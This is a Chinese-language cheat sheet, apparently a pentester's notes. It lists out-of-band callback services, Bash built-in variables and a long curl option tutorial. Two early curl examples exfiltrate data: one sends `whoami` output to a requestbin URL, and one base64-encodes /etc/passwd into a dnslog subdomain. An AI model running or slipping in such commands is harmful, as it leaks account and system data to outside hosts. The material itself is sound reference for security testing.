模拟工具
RequestBin:http://requestbin.net/ (调试http/https交互)
Ceye:http://ceye.io/ (检测带外流量的监控平台,如DNS查询和HTTP请求,收集信息SSRF / XXE / RFI / RCE)
DNSlog:http://www.dnslog.cn/ (解析子域名存放的漏洞,发起DNS请求,日志反弹)
bashupload:https://bashupload.com/ (从命令行上传文件,分析给其他的服务器)
Linux
Bash内置变量
BASH
用途:显示bash的完整路径名。通常是:/bin/bash或/usr/local/bin/bash。BASH_VERSION
用途:bash的版本。FUNCNAME
用途:在函数式执行期,此变量内容即为函数式的名称。HISTCMD
用途:当前指令执行完后,它在历史指令中的排列编号(指定给下一个指令用的历史命令编号)。HISTCONTROL
用途:控制指令是否存入历史脚本文件中。HISTCONTROL有3个可能的设定值:
ignorespace: 凡是指令开头有空格符的,不存入历史脚本文件中。
ignoredups: 连续重复的指令,只存一个。
ignoreboth: 结合前两者的功能。
HISTFILE
用途:设定历史脚本文件的路径文件名。通常是在:家目录/.bash_historyHISTFILESIZE
用途:设定历史脚本文件存储指令的最大行数。HISTIGNORE
用途:不存入历史脚本文件的指令样式,以 : 隔开。HOME
用途:设定用户的家目录位置。通常,root的家目录在/root,一般用户的家目录在/home/账号。替换~的结果,就是HOME变量值。HOSTNAME
用途:显示主机名。HOSTTYPE
用途:显示主机形态。IFS
用途:定义字段分隔字符。默认值为:空格符、tab字符、换行字符(newline)。MACHTYPE
用途:描述主机形态的GNU格式:cpu-公司-系统。MAIL
用途:显示当前用户邮件目录。MAILCHECK
用途:每隔多久就检查一次邮件。通常默认是60秒。PATH
用途:命令的搜寻路径。PPID
用途:父进程的进程编号。RANDOM
用途:随机函数。此变量值,随机出现整数,范围为0-32767。不过,虽然说是随机,但并不是真正的随机,因为每次得到的随机数都一样。为此,在使用RANDOM变量前,请随意设定一个数字给RANDOM,当做随机数种子,这样才不会每次产生的随机数其顺序都一样。
REPLY
用途:select和read没有设定读取变量时,默认的变量名称为REPLY。SHLVL
用途:子shell的层级数。$1~$n
用途:位置参数。传入程序或函数式的参数,第一个参数
$1,第二参数$2,其他类推。请注意,若位置参数n超过9以上,则要用
${n}来表示。$0代表执行程序的名称。$*
用途:代表所有的位置参数,并且视为一个字符串。如:
test.sh ABC 123 xyz,则$*的内容为字符串ABC 123 xyz$@
用途:代表所有的位置参数,但$@代表各位置参数组成的串行。如:
test.sh ABC 123 xyz,则$@的内容为ABC、123、xyz这3个字符串。$#
用途:位置参数的个数。如:
test.sh ABC 123 xyz,有3个参数,$#的值为3。$?
用途:上一条命令执行结束后的传回值。通常0代表执行成功,非0代表执行有误。$$
用途:目前bash shell的进程编号。$<用途:获取目标依赖列表中的第一个依赖。
$_
用途:a. script执行时,bash的绝对路径。
b. 上一个命令执行时,最后一个位置参数,如上一个命令是:
test.sh ABC 123 xyz,则$_的值为xyz。c. 检查邮件时,
$_的值为邮件文件名。
curl
curl 是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端(client)的 URL 工具的意思。
它的功能非常强大,命令行参数多达几十种。如果熟练的话,完全可以取代 Postman 这一类的图形界面工具。
不带有任何参数时,curl 就是发出 GET 请求。
$ curl https://www.example.com执行命令:
1
2$ curl http://requestbin.net/r/1kiej1p1?p=`whoami`
$ curl `cat /etc/passwd|base64`.xxxxxx.dnslog.cn #dnslog带外
参数说明:
-A指定客户端的用户代理标头,即
User-Agent。curl 的默认用户代理字符串是curl/[version]。1
$ curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' https://google.com
-b向服务器发送 Cookie。
1
$ curl -b 'foo=bar' https://google.com
上面命令会生成一个标头
Cookie: foo=bar,向服务器发送一个名为foo、值为bar的 Cookie。-c-c参数将服务器设置的 Cookie 写入一个文件。1
$ curl -c cookies.txt https://www.google.com
上面命令将服务器的 HTTP 回应所设置 Cookie 写入文本文件
cookies.txt。-d-d参数用于发送 POST 请求的数据体。1
2
3$ curl -d'login=emma&password=123'-X POST https://google.com/login
# 或者
$ curl -d 'login=emma' -d 'password=123' -X POST https://google.com/login使用
-d参数以后,HTTP 请求会自动加上标头Content-Type : application/x-www-form-urlencoded。并且会自动将请求转为 POST 方法,因此可以省略-X POST。--data-urlencode--data-urlencode参数等同于-d,发送 POST 请求的数据体,区别在于会自动将发送的数据进行 URL 编码。1
$ curl --data-urlencode 'comment=hello world' https://google.com/login
上面代码中,发送的数据
hello world之间有一个空格,需要进行 URL 编码。-e-e参数用来设置 HTTP 的标头Referer,表示请求的来源。1
curl -e 'https://google.com?q=example' https://www.example.com
上面命令将
Referer标头设为https://google.com?q=example。-G-G参数用来构造 URL 的查询字符串。1
$ curl -G -d 'q=kitties' -d 'count=20' https://google.com/search
上面命令会发出一个 GET 请求,实际请求的 URL 为
https://google.com/search?q=kitties&count=20。如果省略--G,会发出一个 POST 请求。如果数据需要 URL 编码,可以结合
--data--urlencode参数。1
$ curl -G --data-urlencode 'comment=hello world' https://www.example.com
-H-H参数添加 HTTP 请求的标头。1
$ curl -H 'Accept-Language: en-US' https://google.com
上面命令添加 HTTP 标头
Accept-Language: en-US。1
$ curl -H 'Accept-Language: en-US' -H 'Secret-Message: xyzzy' https://google.com
上面命令添加两个 HTTP 标头。
1
$ curl -d '{"login": "emma", "pass": "123"}' -H 'Content-Type: application/json' https://google.com/login
上面命令添加 HTTP 请求的标头是
Content-Type: application/json,然后用-d参数发送 JSON 数据。1
$ curl -H 'User-Agent: php/1.0' https://google.com
上面命令通过
-H参数直接指定标头,更改User-Agent。1
$ curl -H 'Referer: https://google.com?q=example' https://www.example.com
上面命令通过直接添加标头
Referer,达到同样效果。1
$ curl -H 'Host: xxxx' https://www.example.com
上面命令设置Host绕过主机头检测,替代更改host文件的繁琐操作。
1
$ curl -H 'Content-Type:application/json' https://www.example.com
上面命令设置请求头Content-Type,以json格式发送。
1
$ curl -H 'Range: bytes=0-10' https://www.example.com
上面命令请求资源的部分内容(不包括响应头的大小),单位是byte,即字节,从0开始。
格式:
Range: bytes=start-end如:
Range: bytes=10-:第10个字节到最后一个字节之间的数据Range: bytes=40-100:第40个字节到第100个字节之间的数据-i-i参数打印出服务器回应的 HTTP 标头。1
$ curl -i https://www.example.com
上面命令收到服务器回应后,先输出服务器回应的标头,然后空一行,再输出网页的源码。
-L-L参数会让 HTTP 请求跟随服务器的重定向。curl 默认不跟随重定向。1
$ curl -L -d 'tweet=hi' https://api.twitter.com/tweet
-o-o参数将服务器的回应保存成文件,等同于wget命令。1
$ curl -o example.html https://www.example.com
上面命令将
www.example.com保存成example.html。-O-O参数将服务器回应保存成文件,并将 URL 的最后部分当作文件名。1
$ curl -O https://www.example.com/foo/bar.html
上面命令将服务器回应保存成文件,文件名为
bar.html。-u-u参数用来设置服务器认证的用户名和密码。1
$ curl -u 'bob:12345' https://google.com/login
上面命令设置用户名为
bob,密码为12345,然后将其转为 HTTP 标头Authorization: Basic Ym9iOjEyMzQ1。curl 能够识别 URL 里面的用户名和密码。
1
$ curl https://bob:12345@google.com/login
上面命令能够识别 URL 里面的用户名和密码,将其转为上个例子里面的 HTTP 标头。
1
$ curl -u 'bob' https://google.com/login
上面命令只设置了用户名,执行后,curl 会提示用户输入密码。
-v-v参数输出通信的整个过程,用于调试。1
$ curl -v https://www.example.com
-F或--form使用
-F或--form来上传文件,这样会给请求添加enctype="multipart/form-data"参数。1
$ curl -F 'img_avatar=@/home/petehouston/hello.txt' http://localhost/upload
想要同时上传多个文件的话,只需要添加多个
-F选项就可以了。1
$ curl -F 'fileX=@/path/to/fileX' -F 'fileY=@/path/to/fileY' ... http://localhost/upload
想要上传文件数组的话,只需要添加多个
-F选项并命名成相同名字的数组就可以了。1
$ curl -F 'files[]=@/path/to/fileX' -F 'files[]=@/path/to/fileY' ... http://localhost/upload
-x-x参数指定 HTTP 请求的代理。1
$ curl -x socks5://james:cats@myproxy.com:8080 https://www.example.com
上面命令指定 HTTP 请求通过myproxy.com:8080的 socks5 代理发出。
如果没有指定代理协议,默认为 HTTP。
1
$ curl -x james:cats@myproxy.com:8080 https://www.example.com
上面命令中,请求的代理使用 HTTP 协议。
